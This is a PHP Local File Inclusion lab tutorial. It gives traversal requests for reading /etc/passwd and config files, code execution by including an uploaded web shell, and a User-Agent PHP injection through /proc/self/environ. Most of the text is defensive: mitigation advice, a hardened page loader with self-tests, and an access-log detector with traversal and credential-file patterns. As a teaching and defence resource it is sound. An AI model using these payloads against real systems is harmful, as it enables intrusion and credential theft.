Objective: Learn how to exploit Local File Inclusion (LFI) vulnerabilities in PHP web applications to access sensitive files, execute malicious code, and understand how to secure applications against such attacks.
Scenario: LFI vulnerabilities occur when a web application dynamically includes files based on user input without proper validation. This can allow attackers to access sensitive files or execute arbitrary code. Your task is to identify LFI vulnerabilities, exploit them, and implement mitigation techniques.
Lab Setup
- Environment:
  - A PHP-based web application with an LFI vulnerability.
  - Tools like curl or a web browser for testing.
  - Access to a vulnerable server or a local setup (e.g., XAMPP or Docker).
- Example Vulnerable URL:
  http://<target_ip>/vulnerable.php?page=home
Lab Steps
Step 1: Identify the LFI Vulnerability
- Test the application by manipulating the page parameter:
  http://<target_ip>/vulnerable.php?page=../../etc/passwd
- Use curl to automate requests:
  curl "http://<target_ip>/vulnerable.php?page=../../etc/passwd"
- If successful, the server will return the contents of /etc/passwd.
- Example output:
  root:x:0:0:root:/root:/bin/bash
  user:x:1000:1000::/home/user:/bin/bash
Step 2: Access Sensitive Files
- Try accessing application configuration files to extract sensitive information.
- Common targets:
  - /etc/passwd (Linux user accounts)
  - /var/www/html/config.php (application credentials)
- Example request:
  http://<target_ip>/vulnerable.php?page=../../var/www/html/config.php
- Look for database credentials or API keys in the output.
Step 3: Exploit LFI for Code Execution
- If the application allows file uploads, upload a PHP web shell (e.g., shell.php):
  <?php ?>
- Use LFI to include the uploaded file:
  http://<target_ip>/vulnerable.php?page=uploads/shell.php&cmd=id
- Verify command execution through the output (e.g., user ID, current directory).
- Alternatively, exploit /proc/self/environ to execute code:
  - Inject PHP code into the User-Agent header:
    curl -H "User-Agent: <?php system('id'); ?>" "http://<target_ip>/vulnerable.php?page=../../proc/self/environ"
  - If successful, the server will execute the injected code.
Solution
Explanation:
- LFI vulnerabilities allow attackers to include files from the local file system.
- Attackers can use LFI to access sensitive files, execute malicious code, or escalate privileges.
Prevention:
- Validate and Sanitize User Inputs:
  - Restrict input to allowed values using a whitelist:
    $allowed_pages = ['home', 'about', 'contact'];
    $page = $_GET['page'] ?? '';          // missing parameter is treated as an invalid page
    if (in_array($page, $allowed_pages, true)) {   // strict comparison: no type juggling
        include($page . '.php');
    } else {
        echo "Invalid page.";
    }
- Use Absolute Paths:
  - Avoid including files based on raw user input. Anchor the include to a predefined directory instead:
    // $page must still be restricted to a known value (see the whitelist above):
    // a raw "../" in $page would otherwise step out of the pages directory.
    include('/var/www/html/pages/' . $page . '.php');
- Disable Dangerous Functions:
  - Restrict the use of include, require, and file_get_contents on user-controlled paths.
- Harden Server Configurations:
  - Disable file uploads if not needed.
  - Use proper permissions to restrict access to sensitive files.
- Monitor Logs:
  - Monitor server logs for unusual file access patterns or error messages.
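The whitelist and absolute-path items above work best combined in one loader, with a realpath() containment check as defence in depth. The following is an added example, not code from the lab or from its vulnerable.php; the pages directory, the page names and the sample inputs are assumptions chosen for the demo, and it requires PHP 8.

```php
<?php
// Added example (not the lab's own code): a hardened replacement for the
// include($_GET['page'] . '.php') pattern exercised in this lab. It layers an
// allowlist of page names, a fixed absolute base directory and a realpath()
// containment check. The base directory, page names and test inputs below are
// assumptions for the demo.
declare(strict_types=1);

const ALLOWED_PAGES = ['home', 'about', 'contact'];   // the lab's whitelist

/**
 * Map a user-supplied page name to the absolute path of the template to include,
 * or return null when the request must be rejected. The caller does the include().
 */
function resolvePage(string $page, string $baseDir, array $allowed = ALLOWED_PAGES): ?string
{
    // 1. Allowlist with strict comparison: "home" matches, "Home" or "0" does not.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 2. Canonicalise both the base directory and the candidate file. realpath()
    //    resolves "..", symlinks and duplicate separators, and returns false when
    //    the target does not exist, so a missing page is rejected here as well.
    $realBase = realpath($baseDir);
    $realFile = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($realBase === false || $realFile === false) {
        return null;
    }
    // 3. Containment: the file must live below the base directory. The trailing
    //    separator stops "/pages-old/x.php" from passing for the base "/pages".
    if (strpos($realFile, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $realFile;
}

/** How vulnerable.php would use it once fixed. */
function renderPage(string $baseDir): void
{
    $page = $_GET['page'] ?? 'home';
    $file = resolvePage($page, $baseDir);
    if ($file === null) {
        http_response_code(404);
        echo "Invalid page.";
        return;
    }
    include $file;
}

// Self-test against a temporary directory so the example runs offline.
$tmp = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/pages', 0700, true);
foreach (ALLOWED_PAGES as $name) {
    file_put_contents("$tmp/pages/$name.php", "<?php echo '$name';");
}
// A file that exists in the directory but is not allowlisted.
file_put_contents("$tmp/pages/admin.php", "<?php echo 'admin';");

$cases = [
    'home'             => true,   // allowed page, exists
    'about'            => true,
    'Home'             => false,  // case differs: strict allowlist
    'admin'            => false,  // on disk, but not allowlisted
    '../../etc/passwd' => false,  // the lab's traversal payload
    "home\0"           => false,  // null byte is not an allowlisted name
    '../pages/home'    => false,  // would resolve inside the base, still fails the allowlist
];
foreach ($cases as $input => $expectAllowed) {
    $result = resolvePage($input, "$tmp/pages");
    $verdict = (($result !== null) === $expectAllowed) ? 'ok  ' : 'FAIL';
    printf("%s %-20s -> %s\n", $verdict, json_encode($input), $result ?? 'rejected');
}

// Clean up the temporary files.
array_map('unlink', glob("$tmp/pages/*.php"));
rmdir("$tmp/pages");
rmdir($tmp);
```

Run it from the command line with php (the file name is up to you); every case should print "ok". The php.ini directives open_basedir and allow_url_include=Off complement this at the interpreter level, and the "Invalid page." branch is the natural place to log the rejected value for the Monitor Logs step.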
Testing and Verification
- Re-test the vulnerable URLs after implementing the mitigations to confirm the vulnerability is resolved.
- Attempt to access sensitive files or execute code to confirm the application is secure.
- Document all findings and changes for future reference.
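The re-test requests from the steps above leave a recognisable trail in the web server access log, which is what the Monitor Logs item asks you to watch. The following detector is an added example, not part of the lab; it parses lines in the Apache/nginx "combined" format, URL-decodes the request path (twice, to catch double encoding), flags the traversal sequences and sensitive targets named in this lab, and groups hits per client IP. The log lines, IPs and timestamps are constructed for the demo, and it requires PHP 8.

```php
<?php
// Added example (not part of the lab): detect the access-log signs of the LFI
// attempts practised in Steps 1-3. Sample log lines are constructed for the demo.
declare(strict_types=1);

// Apache/nginx "combined" format: ip - - [time] "METHOD path HTTP/x" status size "referer" "ua"
const LOG_LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';

// Indicators checked against the decoded request path, each with the reason reported.
const LFI_INDICATORS = [
    '/\.\.[\/\\\\]/'           => 'directory traversal',
    '/\/etc\/passwd/i'         => 'read of /etc/passwd',
    '/\/proc\/self\/environ/i' => 'read of /proc/self/environ',
    '/\bphp:\/\//i'            => 'php:// stream wrapper',
    '/\0/'                     => 'null byte in path',
];

/** Split one combined-format line into its fields, or return null if it does not parse. */
function parseLogLine(string $line): ?array
{
    if (preg_match(LOG_LINE_RE, $line, $m) !== 1) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int) $m[5], 'ua' => $m[6]];
}

/** Return the indicator names that match a request path after URL decoding. */
function lfiIndicators(string $path): array
{
    // Decode twice so that %252e%252e%252f (double-encoded ../) is caught as well.
    $decoded = rawurldecode(rawurldecode($path));
    $hits = [];
    foreach (LFI_INDICATORS as $re => $reason) {
        if (preg_match($re, $decoded) === 1) {
            $hits[] = $reason;
        }
    }
    return $hits;
}

/** Scan log lines; return per-IP hit counts and the individual suspicious entries. */
function scanAccessLog(array $lines): array
{
    $report = ['by_ip' => [], 'entries' => []];
    foreach ($lines as $line) {
        $entry = parseLogLine($line);
        if ($entry === null) {
            continue;
        }
        $reasons = lfiIndicators($entry['path']);
        // The User-Agent is checked too: the /proc/self/environ step smuggles PHP through it.
        if (str_contains($entry['ua'], '<?php')) {
            $reasons[] = 'PHP tag in User-Agent';
        }
        if ($reasons === []) {
            continue;
        }
        $report['by_ip'][$entry['ip']] = ($report['by_ip'][$entry['ip']] ?? 0) + 1;
        $report['entries'][] = ['ip' => $entry['ip'], 'path' => $entry['path'],
                                'status' => $entry['status'], 'reasons' => $reasons];
    }
    return $report;
}

// Constructed sample log: the IPs, times and paths are made up for the demo.
$sample = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /vulnerable.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /vulnerable.php?page=../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /vulnerable.php?page=%2e%2e%2f%2e%2e%2fvar/www/html/config.php HTTP/1.1" 200 97 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /vulnerable.php?page=../../proc/self/environ HTTP/1.1" 500 0 "-" "<?php system(\'id\'); ?>"',
    '198.51.100.2 - - [10/Mar/2024:12:01:00 +0000] "GET /vulnerable.php?page=about HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
];

$report = scanAccessLog($sample);
foreach ($report['entries'] as $e) {
    printf("%-13s %3d %s\n    %s\n", $e['ip'], $e['status'], $e['path'], implode(', ', $e['reasons']));
}
print_r($report['by_ip']);   // 203.0.113.7 should show 3 hits, 198.51.100.2 none
```

After the fix is deployed, the same scan should show the traversal requests answered with 404 rather than 200, which is the evidence worth keeping with the documented findings. Feed it a real log with file() on the access log path instead of the constructed $sample array.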
Reflection
This exercise highlights the risks posed by LFI vulnerabilities in PHP applications and demonstrates how to exploit and secure them. By completing this lab, you’ve gained practical experience in identifying, exploiting, and mitigating LFI vulnerabilities to improve web application security.